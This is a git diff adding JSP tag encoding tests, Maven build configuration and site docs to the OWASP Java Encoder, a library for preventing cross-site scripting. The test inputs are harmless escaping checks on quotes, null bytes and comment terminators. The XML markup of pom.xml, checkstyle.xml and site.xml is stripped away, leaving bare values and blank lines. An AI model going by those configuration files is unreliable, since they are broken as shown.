CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptBlockTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptBlockTagTest extends EncodingTagTest { + + public ForJavaScriptBlockTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptBlockTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptBlockTag instance = new ForJavaScriptBlockTag(); + String value = "'\"\0"; + String expected = "\\'\\\"\\x00"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java new file mode 100644 index 0000000..0ea95fc --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptSourceTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptSourceTagTest extends EncodingTagTest { + + public ForJavaScriptSourceTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptSourceTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptSourceTag instance = new ForJavaScriptSourceTag(); + String value = "\0'\""; + String expected = "\\x00\\'\\\""; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java new file mode 100644 index 0000000..2d4f67a --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java @@ -0,0 +1,46 @@ +/* + * To change this template, choose Tools | Templates + * and open the template in the editor. + */ +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptTagTest extends EncodingTagTest { + + public ForJavaScriptTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptTag instance = new ForJavaScriptTag(); + String value = "\0'\""; + String expected = "\\x00\\x27\\x22"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java new file mode 100644 index 0000000..3d9d11c --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForUriComponentTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriComponentTagTest extends EncodingTagTest { + + public ForUriComponentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForUriComponentTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForUriComponentTag instance = new ForUriComponentTag(); + String value = "&=test"; + String expected = "%26amp%3B%3Dtest"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java new file mode 100644 index 0000000..ac16812 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForUriTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriTagTest extends EncodingTagTest { + + public ForUriTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForUriTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForUriTag instance = new ForUriTag(); + String value = "\\\""; + String expected = "%5C%22"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java new file mode 100644 index 0000000..4246516 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForXmlAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlAttributeTagTest extends EncodingTagTest { + + public ForXmlAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForXmlAttributeTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForXmlAttributeTag instance = new ForXmlAttributeTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java new file mode 100644 index 0000000..cea3db3 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForXmlCommentTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlCommentTagTest extends EncodingTagTest { + + public ForXmlCommentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForXmlCommentTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForXmlCommentTag instance = new ForXmlCommentTag(); + String value = "--> + + + 4.0.0 + + org.owasp.encoder + encoder-parent + 1.2.3 + pom + + OWASP Java Encoder Project + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + core + jsp + esapi + + + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + 2011 + + OWASP (Open Web-Application Security Project) + https://www.owasp.org/ + + + + + The BSD 3-Clause License + http://www.opensource.org/licenses/BSD-3-Clause + repo + + + + + org.sonatype.oss + oss-parent + 9 + + + + scm:git:git@github.com:owasp/owasp-java-encoder.git + scm:git:git@github.com:owasp/owasp-java-encoder.git + https://github.com/owasp/owasp-java-encoder + + + + gh-pages + gh-pages + http://owasp.github.io/owasp-java-encoder + + + + + Owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + owasp-java-encoder-project@lists.owasp.org + http://lists.owasp.org/pipermail/owasp-java-encoder-project/ + + + + + github + https://github.com/owasp/owasp-java-encoder/issues + + + + + Jeff Ichnowski + + Project Owner + Architect + Developer + + + + Jim Manico + OWASP + https://www.owasp.org/ + + Architect + Developer + + + + Jeremy Long + jeremy.long@owasp.org + OWASP + https://www.owasp.org/ + + developer + + + + + + UTF-8 + UTF-8 + + + + + + junit + junit + 3.8.2 + + + + + + junit + junit + test + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.10.1 + + + org.apache.maven.plugins + maven-jar-plugin + 3.2.2 + + + org.apache.maven.plugins + maven-source-plugin + 3.2.1 + + + org.apache.maven.plugins + maven-javadoc-plugin + 3.4.0 + + + org.jacoco + jacoco-maven-plugin + 0.8.8 + + + org.apache.maven.plugins + maven-failsafe-plugin + 2.19.1 + + + org.apache.maven.plugins + maven-surefire-plugin + 2.19.1 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.19.1 + + + org.apache.maven.plugins + maven-gpg-plugin + 1.6 + + + org.apache.maven.plugins + maven-site-plugin + + 3.4 + + + lt.velykis.maven.skins + reflow-velocity-tools + 1.1.1 + + + + org.apache.velocity + velocity + 1.7 + + + org.apache.maven.doxia + doxia-module-markdown + 1.6 + + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.9 + + + org.apache.maven.plugins + maven-pmd-plugin + 3.6 + + + org.apache.felix + maven-bundle-plugin + 3.3.0 + + + org.codehaus.mojo + versions-maven-plugin + 2.3 + + + org.apache.maven.plugins + maven-jxr-plugin + 2.5 + + + org.codehaus.mojo + findbugs-maven-plugin + 3.0.4 + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + + 1.6 + 1.6 + + + + org.apache.felix + maven-bundle-plugin + + + default-bundle + process-classes + + manifest + + + true + + <_noee>true + <_nouses>true + ${jigsaw.module.name} + + + + + + + org.jacoco + jacoco-maven-plugin + + + prepare-agent + + prepare-agent + + + surefireArgLine + + + + + + org.apache.maven.plugins + maven-surefire-plugin + + + org/owasp/encoder/BenchmarkTest.java + + ${surefireArgLine} + + + + org.apache.maven.plugins + maven-jar-plugin + + + default-jar + package + + jar + + + + + + org.apache.maven.plugins + maven-source-plugin + + + attach-sources + package + + jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + attach-javadocs + package + + jar + + + 1.6 + false + + + + + + org.apache.maven.plugins + maven-site-plugin + + + + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + + + org.apache.maven.plugins + maven-surefire-report-plugin + + + + report-only + failsafe-report-only + + + + + + org.jacoco + jacoco-maven-plugin + + + + + report + + + + + + org.apache.maven.plugins + maven-pmd-plugin + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + default + + javadoc + + + 1.6 + false + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + + src/main/config/checkstyle.xml + src/main/config/checkstyle-header.txt + + + + org.codehaus.mojo + findbugs-maven-plugin + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/src/main/config/checkstyle-header.txt b/src/main/config/checkstyle-header.txt new file mode 100644 index 0000000..3b51065 --- /dev/null +++ b/src/main/config/checkstyle-header.txt @@ -0,0 +1,33 @@ +^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$ +^// All rights reserved\.\s*$ +^// +^// Redistribution and use in source and binary forms, with or without\s*$ +^// modification, are permitted provided that the following conditions\s*$ +^// are met:\s*$ +^//\s*$ +^// \* Redistributions of source code must retain the above\s*$ +^// copyright notice, this list of conditions and the following\s*$ +^// disclaimer\.\s*$ +^// +^// \* Redistributions in binary form must reproduce the above\s*$ +^// copyright notice, this list of conditions and the following\s*$ +^// disclaimer in the documentation and/or other materials\s*$ +^// provided with the distribution.\s*$ +^// +^// \* Neither the name of the OWASP nor the names of its\s*$ +^// contributors may be used to endorse or promote products\s*$ +^// derived from this software without specific prior written\s*$ +^// permission\.\s*$ +^// +^// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\s*$ +^// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\s*$ +^// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\s*$ +^// FOR A PARTICULAR PURPOSE ARE DISCLAIMED\. IN NO EVENT SHALL THE\s*$ +^// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\s*$ +^// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\s*$ +^// \(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\s*$ +^// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION\)\s*$ +^// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\s*$ +^// STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)\s*$ +^// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\s*$ +^// OF THE POSSIBILITY OF SUCH DAMAGE\.\s*$ diff --git a/src/main/config/checkstyle.xml b/src/main/config/checkstyle.xml new file mode 100644 index 0000000..3f2c8b6 --- /dev/null +++ b/src/main/config/checkstyle.xml @@ -0,0 +1,204 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/site/markdown/index.md b/src/site/markdown/index.md new file mode 100644 index 0000000..0273e4f --- /dev/null +++ b/src/site/markdown/index.md @@ -0,0 +1,56 @@ +## OWASP Java Encoder Project + +The OWASP Java Encoder Project is a collection of high-performance low-overhead +contextual encoders, that when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### Usage + +In addition to the usage guidance below, more examples can be found on the [OWASP Java Encoder Project Wiki](https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project). + +The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). + +```xml + + org.owasp.encoder + encoder + 1.2.3 + +``` + +Utilize the encoder: + +```java +import org.owasp.encoder.Encode; + +//... + +PrintWriter out = ....; +out.println(""); +``` + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.3 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

    Dynamic data via EL: ${e:forHtml(param.value)}

    +

    Dynamic data via tag:

    +``` diff --git a/src/site/resources/images/owasp.jpg b/src/site/resources/images/owasp.jpg new file mode 100644 index 0000000..addae89 Binary files /dev/null and b/src/site/resources/images/owasp.jpg differ diff --git a/src/site/site.xml b/src/site/site.xml new file mode 100644 index 0000000..f1d4a83 --- /dev/null +++ b/src/site/site.xml @@ -0,0 +1,92 @@ + + + + + lt.velykis.maven.skins + reflow-maven-skin + 1.1.1 + + + + + OWASP Java Encoder Project + OWASP Java Encoder Project + OWASP Java Encoder Project + ./images/owasp.jpg + 107 + 300 + + + + default + true + github + + ${project.name} + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + false + top + 6 + Modules|Maven Documentation + + Modules + Contribute + Maven Documentation + + + + + + + + + + + + + + + + + + + + + + -- cgit v1.2.3